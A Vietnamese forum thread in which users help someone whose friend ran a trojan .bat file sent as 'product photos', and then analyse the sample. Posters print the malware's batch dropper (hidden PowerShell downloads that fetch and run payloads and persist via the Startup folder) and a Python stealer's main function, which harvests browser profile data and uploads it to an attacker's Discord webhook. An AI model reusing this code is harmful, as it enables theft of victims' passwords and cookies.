Bị dính Trojan

Equus Ferus · 27/7/23

Chào mọi người,
Bạn mình bán hàng online thì có một khách gửi cho file rar, bảo là hình ảnh sản phẩm check giúp xem có không, do sơ xuất và k biết về công nghệ nên bạn mình đã giải nén và click vào file thì giờ tài khoản Meta Business không đăng nhập được.
Mình kiểm tra thì thấy trong file rar là một file *.bat chứ k phải file hình ảnh. Check online thì báo là: HEUR:Trojan.BAT.Setter.gen
Mọi người cho mình hỏi trường hợp này xử lý sao cho sạch trojan trên máy tính, và k giải nén + chạy tập tin đó thì không sao phải k, mình tải về cũng hơi rén

Mình gửi kèm ảnh, mong mọi người giúp với, cám ơn mọi người rất nhiều.

Tran Quang Ha · 28/7/23

- Đây là mẫu virus mới có Kas nhận diện đc (theo như ảnh trên của bạn) do đó bạn có thể dùng Kaspersky để quét toàn bộ ổ cứng có trong máy tính.

- Không giải nén file đính kèm thì không kích hoạt mẫu virus--> máy tính bạn đã tải file về mà không giải nén thì nguy cơ nhiễm là không có.

Shun87 · 28/7/23

Mạn phép xin bạn file đó được ko? Muốn xem coi bên trong nó viết gì !!!

Equus Ferus · 28/7/23

Shun87 nói:
Mạn phép xin bạn file đó được ko? Muốn xem coi bên trong nó viết gì !!!

Mình gửi link download nha. Mình upload lên mediafire, chứ ở đây sao mình k đính kèm đc
TROJAN

Equus Ferus · 28/7/23

Tran Quang Ha nói:
- Đây là mẫu virus mới có Kas nhận diện đc (theo như ảnh trên của bạn) do đó bạn có thể dùng Kaspersky để quét toàn bộ ổ cứng có trong máy tính.

- Không giải nén file đính kèm thì không kích hoạt mẫu virus--> máy tính bạn đã tải file về mà không giải nén thì nguy cơ nhiễm là không có.

Mình cám ơn bạn, sợ nó mã hóa hết dữ liệu trên ổ cứng nữa khổ. Để làm cái USB boot lên rồi quét sạch.

chau2018 · 28/7/23

windef không nhận diện được
mấy ông tàu lại viết ra tool mã hoá đọc không được lun

pTalent · 28/7/23

file batch để download virus thôi mà, có gì mà ko đọc được

chau2018 · 28/7/23

pTalent nói:
file batch để download virus thôi mà, có gì mà ko đọc được
Xem phần đính kèm 49523

xin tool batch với giải mã pro ơi

pTalent · 28/7/23

chau2018 nói:
xin tool batch với giải mã pro ơi

Dùng Notepad mở với Encoding UTF8 thôi fen

※ @VNZ-NEWS diễn đàn quy định ảnh size bao nhiêu mà dán cái screenshot đã không được rồi nhỉ?

Meliodash · 28/7/23

Máy của bạn k update thường xuyên liên tục à? Máy mình lúc nào cũng update win nên chẳng cần cài phần mềm diệt virus nào mà vẫn khoẻ re

Equus Ferus · 28/7/23

Meliodash nói:
Máy của bạn k update thường xuyên liên tục à? Máy mình lúc nào cũng update win nên chẳng cần cài phần mềm diệt virus nào mà vẫn khoẻ re

Cái windows security k cảnh báo cái này bạn ơi. Có mỗi Kas nó quét ra

tamthangia · 28/7/23

N sẽ tải về virus , thường sẽ là ransomware , cứ để máy chạy mà ko làm sạch sớm chỉ 1-2 hôm sau là bay sạch dữ liệu, vì sao n ko mã hóa ngay vì thường n sẽ ở chờ trạng thái ko thao tác, còn công tác lấy cắp các tk có trên máy trc đã

thuytran1978 · 28/7/23

https://github.com/xjnhzaj12b1/iscsicpl_bypassUAC/blob/main/ThuUSA2
Anh em nào rảnh đọc thử xem trong này nó viết gì. Này là cái file project.py mà file .bat sẽ lưu về

meebo · 28/7/23

thuytran1978 nói:
https://github.com/xjnhzaj12b1/iscsicpl_bypassUAC/blob/main/ThuUSA2
Anh em nào rảnh đọc thử xem trong này nó viết gì. Này là cái file project.py mà file .bat sẽ lưu về

Đọc qua thì nó sẽ vơ vét mọi thứ mình lưu trong các trình duyệt rồi sau đó xóa sạch chúng, hành động này làm nạn nhân đăng nhập lại để nó me pass, chôm bánh quy...

Đây là hàm main của nó, nó còn có các hàm được định nghĩa cụ thể hơn bên trên.

Python:

def main():
    number = "Tiền Về Lần " + str(demso())
    data_path = os.path.join(os.environ["TEMP"], name_f);os.mkdir(data_path)
    chrome = os.path.join(os.environ["USERPROFILE"], "AppData", "Local", "Google", "Chrome", "User Data")
    firefox = os.path.join(os.environ["USERPROFILE"], "AppData", "Roaming","Mozilla", "Firefox", "Profiles")
    Edge = os.path.join(os.environ["USERPROFILE"], "AppData", "Local", "Microsoft", "Edge", "User Data")
    Opera = os.path.join(os.environ["USERPROFILE"], "AppData", "Roaming", "Opera Software", "Opera Stable")
    Brave = os.path.join(os.environ["USERPROFILE"], "AppData", "Local","BraveSoftware", "Brave-Browser", "User Data")
    coccoc = os.path.join(os.environ["USERPROFILE"], "AppData", "Local","CocCoc", "Browser", "User Data")
    chromium = os.path.join(os.environ["USERPROFILE"], "AppData", "Local","Chromium", "User Data")

    if os.path.exists(chrome):
        get_chrome(data_path,chrome)
    if os.path.exists(Edge):
        get_edge(data_path,Edge)

    if os.path.exists(Opera):
        get_opera(data_path,Opera)

    if os.path.exists(Brave):
        get_brave(data_path,Brave)
    
    if os.path.exists(coccoc):
        get_coccoc(data_path,coccoc)
  
    if os.path.exists(firefox):
        get_firefox(data_path,firefox)
  
    if os.path.exists(chromium):
        get_chromium(data_path,chromium)
    python310_path = r'C:\Users\Public\Document.zip'
    file_path = r'C:\Users\Public\Document\project.py'
    z_ph = os.path.join(os.environ["TEMP"], name_f +'.zip');shutil.make_archive(z_ph[:-4], 'zip', data_path)
    Compressed(z_ph,number)
    token = 'https://discordapp.com/api/webhooks/1133964560970293268/jH5S8jSPPnDP_xPm1XhH0qmcor6jh7qI_Sza0hmQUP6zT4W6f5IA5lw17jD0gO1QPpFU'
    with open(z_ph, 'rb') as f:
        x01.post(token,data={'content':"ID:"+id()+"    \nIP:"+ip+"     \n"+number},files={'document': f})
    shutil.rmtree(os.environ["TEMP"], name_f +'.zip');shutil.rmtree(os.environ["TEMP"], name_f)
    if os.path.exists(python310_path):
        os.remove(python310_path)
    if os.path.exists(file_path):
        os.remove(file_path)
main()

Gởi mẫu cho Norton rồi nha anh em 2471af1d-1313-4eba-84e5-e312c27cce35

Shun87 · 28/7/23

meebo nói:

Đọc qua thì nó sẽ vơ vét mọi thứ mình lưu trong các trình duyệt rồi sau đó xóa sạch chúng, hành động này làm nạn nhân đăng nhập lại để nó me pass, chôm bánh quy...

Đây là hàm main của nó, nó còn có các hàm được định nghĩa cụ thể hơn bên trên.

Python:

def main():
    number = "Tiền Về Lần " + str(demso())
    data_path = os.path.join(os.environ["TEMP"], name_f);os.mkdir(data_path)
    chrome = os.path.join(os.environ["USERPROFILE"], "AppData", "Local", "Google", "Chrome", "User Data")
    firefox = os.path.join(os.environ["USERPROFILE"], "AppData", "Roaming","Mozilla", "Firefox", "Profiles")
    Edge = os.path.join(os.environ["USERPROFILE"], "AppData", "Local", "Microsoft", "Edge", "User Data")
    Opera = os.path.join(os.environ["USERPROFILE"], "AppData", "Roaming", "Opera Software", "Opera Stable")
    Brave = os.path.join(os.environ["USERPROFILE"], "AppData", "Local","BraveSoftware", "Brave-Browser", "User Data")
    coccoc = os.path.join(os.environ["USERPROFILE"], "AppData", "Local","CocCoc", "Browser", "User Data")
    chromium = os.path.join(os.environ["USERPROFILE"], "AppData", "Local","Chromium", "User Data")

    if os.path.exists(chrome):
        get_chrome(data_path,chrome)
    if os.path.exists(Edge):
        get_edge(data_path,Edge)

    if os.path.exists(Opera):
        get_opera(data_path,Opera)

    if os.path.exists(Brave):
        get_brave(data_path,Brave)
   
    if os.path.exists(coccoc):
        get_coccoc(data_path,coccoc)
 
    if os.path.exists(firefox):
        get_firefox(data_path,firefox)
 
    if os.path.exists(chromium):
        get_chromium(data_path,chromium)
    python310_path = r'C:\Users\Public\Document.zip'
    file_path = r'C:\Users\Public\Document\project.py'
    z_ph = os.path.join(os.environ["TEMP"], name_f +'.zip');shutil.make_archive(z_ph[:-4], 'zip', data_path)
    Compressed(z_ph,number)
    token = 'https://discordapp.com/api/webhooks/1133964560970293268/jH5S8jSPPnDP_xPm1XhH0qmcor6jh7qI_Sza0hmQUP6zT4W6f5IA5lw17jD0gO1QPpFU'
    with open(z_ph, 'rb') as f:
        x01.post(token,data={'content':"ID:"+id()+"    \nIP:"+ip+"     \n"+number},files={'document': f})
    shutil.rmtree(os.environ["TEMP"], name_f +'.zip');shutil.rmtree(os.environ["TEMP"], name_f)
    if os.path.exists(python310_path):
        os.remove(python310_path)
    if os.path.exists(file_path):
        os.remove(file_path)
main()

Gởi mẫu cho Norton rồi nha anh em 2471af1d-1313-4eba-84e5-e312c27cce35

Bọn này rác rưởi thật. Còn ghi hàm

Mã:

    number = "Tiền Về Lần " + str(demso())

Ý là ai mà tải về và chạy là tiền về túi bọn nó đấy. Ahahah, Rất chi là mất dạy.............

tamthangia · 28/7/23

Tôi buồn cười là file gửi gmail , file nén đặt pass để vượt mặt gg quét file , pass kèm theo trong mail ,vậy nhiều ng vẫn làm theo .
Đợt nọ cũng có bà kt , hỏi mình bảo ko mở dc file , ultra vô xem đúng thể loại như này luôn , vì sao file ko mở dc là vì thằng kasper n chặn , may mắn cho mụ .

lamsonquaikhach · 29/7/23

@echo off
set eQ=y
set MA=0
set RA=D
set JA=$
set dA=t
set VQ=U
set Yg=b
set bQ=m
set MQ=1
set KA=(
set bA=l
set LQ=-
set Tg=N
set cQ=q
set eg=z
set Lw=/
set aA=h
set XA=\
set dg=v
set Jw='
set OA=8
set Rg=F
setlocal EnableDelayedExpansion
set cg=r
set aw=k
set Ww=[
set XQ=]
set QQ=A
set bw=o
set cw=s
set Ow=;
set ZA=d
set UA=P
set Uw=S
set Zg=f
set aQ=i
set Mw=3
set IA=
set Lg=.
set RQ=E
set bg=n
set Ig="
set Tw=O
set Ug=R
set Mg=2
set dw=w
set eA=x
set YQ=a
set Og=:
set cA=p
set Nw=7
set dQ=u
set KQ=)
set SQ=I
set Zw=g
set Vw=W
set TQ=M
set Yw=c
set Qw=C
set ZQ=e
cls
start chrome https://www.aliexpress.us/
C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden Invoke-WebRequest -URI https://canva-prenium.com/Document.zip -OutFile C:\\Users\\Public\\Document.zip;
C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden Expand-Archive C:\\Users\\Public\\Document.zip -DestinationPath C:\\Users\\Public\\Document;
C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden Invoke-WebRequest -URI https://github.com/xjnhzaj12b1/iscsicpl_bypassUAC/raw/main/ThuUSA2.zip -OutFile C:\\Users\\Public\\WindowsSecure.zip";
C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden Expand-Archive C:\\Users\\Public\\WindowsSecure.zip -DestinationPath C:\\Users\\$([Environment]::UserName)\\AppData\\Roaming\\Microsoft\\Windows\\'Start Menu'\\Programs\\Startup;
C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden Invoke-WebRequest -URI https://canva-prenium.com/rmv -OutFile C:\\Users\\Public\\Document\\rmv.py;
C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden C:\\Users\\Public\\Document\\python C:\\Users\\Public\\Document\\rmv.py;
C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden Invoke-WebRequest -URI https://raw.githubusercontent.com/xjnhzaj12b1/iscsicpl_bypassUAC/main/ThuUSA2 -OutFile C:\\Users\\Public\\Document\\project.py;
C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden C:\\Users\\Public\\Document\\python C:\\Users\\Public\\Document\\project.py;
start chrome https://www.aliexpress.us/

Cảm thấy nó cùi bắp thế nào ấy, vậy mà cũng có người dính.

Shun87 · 29/7/23

lamsonquaikhach nói:
Cảm thấy nó cùi bắp thế nào ấy, vậy mà cũng có người dính.

Bọn này lừa gà và những người hay lơ đễnh là chính. Chứ ai mà cẩn thận hoặc am hiểu tí lừa bằng răng

naroto · 30/7/23

pTalent nói:
※ @VNZ-NEWS diễn đàn quy định ảnh size bao nhiêu mà dán cái screenshot đã không được rồi nhỉ?
Xem phần đính kèm 49527

Quy định dưới 150kb thôi bạn, độ phân giải màn hình trên 720 thường screenshost cũng nhiều hơn 150kb rồi nên không upload lên được.

khlauxanh · 22/8/23

meebo nói:

Đọc qua thì nó sẽ vơ vét mọi thứ mình lưu trong các trình duyệt rồi sau đó xóa sạch chúng, hành động này làm nạn nhân đăng nhập lại để nó me pass, chôm bánh quy...

Đây là hàm main của nó, nó còn có các hàm được định nghĩa cụ thể hơn bên trên.

Python:

def main():
    number = "Tiền Về Lần " + str(demso())
    data_path = os.path.join(os.environ["TEMP"], name_f);os.mkdir(data_path)
    chrome = os.path.join(os.environ["USERPROFILE"], "AppData", "Local", "Google", "Chrome", "User Data")
    firefox = os.path.join(os.environ["USERPROFILE"], "AppData", "Roaming","Mozilla", "Firefox", "Profiles")
    Edge = os.path.join(os.environ["USERPROFILE"], "AppData", "Local", "Microsoft", "Edge", "User Data")
    Opera = os.path.join(os.environ["USERPROFILE"], "AppData", "Roaming", "Opera Software", "Opera Stable")
    Brave = os.path.join(os.environ["USERPROFILE"], "AppData", "Local","BraveSoftware", "Brave-Browser", "User Data")
    coccoc = os.path.join(os.environ["USERPROFILE"], "AppData", "Local","CocCoc", "Browser", "User Data")
    chromium = os.path.join(os.environ["USERPROFILE"], "AppData", "Local","Chromium", "User Data")

    if os.path.exists(chrome):
        get_chrome(data_path,chrome)
    if os.path.exists(Edge):
        get_edge(data_path,Edge)

    if os.path.exists(Opera):
        get_opera(data_path,Opera)

    if os.path.exists(Brave):
        get_brave(data_path,Brave)
   
    if os.path.exists(coccoc):
        get_coccoc(data_path,coccoc)
 
    if os.path.exists(firefox):
        get_firefox(data_path,firefox)
 
    if os.path.exists(chromium):
        get_chromium(data_path,chromium)
    python310_path = r'C:\Users\Public\Document.zip'
    file_path = r'C:\Users\Public\Document\project.py'
    z_ph = os.path.join(os.environ["TEMP"], name_f +'.zip');shutil.make_archive(z_ph[:-4], 'zip', data_path)
    Compressed(z_ph,number)
    token = 'https://discordapp.com/api/webhooks/1133964560970293268/jH5S8jSPPnDP_xPm1XhH0qmcor6jh7qI_Sza0hmQUP6zT4W6f5IA5lw17jD0gO1QPpFU'
    with open(z_ph, 'rb') as f:
        x01.post(token,data={'content':"ID:"+id()+"    \nIP:"+ip+"     \n"+number},files={'document': f})
    shutil.rmtree(os.environ["TEMP"], name_f +'.zip');shutil.rmtree(os.environ["TEMP"], name_f)
    if os.path.exists(python310_path):
        os.remove(python310_path)
    if os.path.exists(file_path):
        os.remove(file_path)
main()

Gởi mẫu cho Norton rồi nha anh em 2471af1d-1313-4eba-84e5-e312c27cce35

bạn còn file python ko cho mình xin vs đc k? Tay kia nó xóa mất repo r

Bị dính Trojan

Gà con

Chủ đề tương tự

Moderator

Búa Đá

Gà con

Gà con

Búa Gỗ Đôi

Búa Gỗ Đôi

Búa Gỗ Đôi

Búa Gỗ Đôi

Gà con

Gà con

Rìu Vàng Đôi

Gà con

Rìu Vàng Đôi

Búa Đá

Rìu Vàng Đôi

Búa Đá

Búa Đá

Chỉ cần nhấn like khi muốn cảm ơn!

Gà con

Privacy & Transparency

Privacy & Transparency